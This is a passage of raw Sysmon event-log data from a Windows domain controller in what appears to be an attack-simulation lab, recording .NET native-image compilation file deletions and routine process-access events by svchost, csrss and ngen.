AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5YV6HSGMBM\UIAutomationTypes.ni.dll.auxMD5=125E54A2251EE2BE85374C3DC103810C,SHA256=1CFE5F92C614A185305A49F0B37463A35B7903908480E5CA456AF8BED6AFF5A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.405{4DB9351A-A28C-60D3-0E06-00000000CF01}1112NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5YV6HSGMBM\UIAutomationTypes.ni.dllMD5=CCFB65CA0C9EB162F06D67CBDB44C261,SHA256=7AE16787567C9A3C4B2B4D25207C9D73C878035A5709F4AA5D6CB0E2271FCEDA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0E06-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.373{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0E06-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.358{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0E06-00000000CF01}1112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.358{4DB9351A-A28C-60D3-0D06-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XPC5F3OA1L\UIAutomationProvider.ni.dll.auxMD5=73A0A186A42DF59F24F621C4FD8905E5,SHA256=04EF1DCA96679CDB2B4F93E6C83061CD13F74D9F191222EADF4A13DEDEEE930F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.358{4DB9351A-A28C-60D3-0D06-00000000CF01}6984NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\XPC5F3OA1L\UIAutomationProvider.ni.dllMD5=82E0D3B60B2AD60FDCDD9F6D564CD9C4,SHA256=393884F57E396520E2FC8ED9A81A14C9716E4D77A750E921CA0A80172C3B5B62,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0D06-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0D06-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.326{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0D06-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.326{4DB9351A-A28C-60D3-0C06-00000000CF01}852NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KW48HP67PA\UIAutomationClientsideProviders.ni.dll.auxMD5=0142AE5F1F2370FDA8F69680375FA766,SHA256=08AE7812D94B316CD7BBDBA34174232CE6479BE9D0888957376AE296E2A869A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.326{4DB9351A-A28C-60D3-0C06-00000000CF01}852NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KW48HP67PA\UIAutomationClientsideProviders.ni.dllMD5=3B049C27C843CF23F461C0D4A6C787FA,SHA256=37509CECBC135C03425F6DF99EF952D747E51E6CAAB47FE163D43945F4E7B45F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.264{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0C06-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.264{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83D779EE4ED567877098F1E538CC521,SHA256=926365F192773B55B006F87D78F058B369BE010EFF16814D99C78BB2085ED9C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.248{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0C06-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.248{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0C06-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.248{4DB9351A-A28C-60D3-0B06-00000000CF01}2904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LZPKFHDO31\UIAutomationClient.ni.dll.auxMD5=8557E39E21D80E6D57B89BE5A30B793F,SHA256=0D6F703EB57C3678CC242C90E4D91E45A229BF4AB676450153B584BE23953BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.248{4DB9351A-A28C-60D3-0B06-00000000CF01}2904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LZPKFHDO31\UIAutomationClient.ni.dllMD5=7FC881275A1865F5C71DEDFB383EE37B,SHA256=6F0FEB683403BAAE2B6DB31019F21EC010981B8EFBC4599ECC190694BAD0C560,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0B06-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.201{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0B06-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.201{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0B06-00000000CF01}2904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.201{4DB9351A-A28C-60D3-0A06-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BH4KICEO9Y\TaskScheduler.ni.dll.auxMD5=6934FD702FCB8F7CE8F2D1A223770B70,SHA256=A4A33106CA902496E16394A9C412039EECA05C9BB85B46B7351FC02B2D669F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.201{4DB9351A-A28C-60D3-0A06-00000000CF01}4896NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BH4KICEO9Y\TaskScheduler.ni.dllMD5=6C9E99836A5DFD7B495B8C41C48ABB7B,SHA256=0BAA95C6D0DDF55E4A1CDA946D9B6D21A271B6E19A03E4B840D45A520E666435,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.170{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0A06-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0A06-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.139{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0A06-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.123{4DB9351A-A28C-60D3-0906-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\213KWH0QLH\System.Xml.Serialization.ni.dll.auxMD5=5FFEDFC307A075FBFB0424B9ADC58076,SHA256=04BA2952DE88C5B3C66CBE3348142F985D6FE3FD45720214B0AB7AAC86A73E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.123{4DB9351A-A28C-60D3-0906-00000000CF01}5712NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\213KWH0QLH\System.Xml.Serialization.ni.dllMD5=EDCF8C8956FE4F8DD72415F4F9D140C4,SHA256=B4A7A15D556BA6A34C6054B31372636015C6245CD5EB8B7CBF906D4B9AFF4C9D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0906-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.092{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0906-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0906-00000000CF01}5712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cb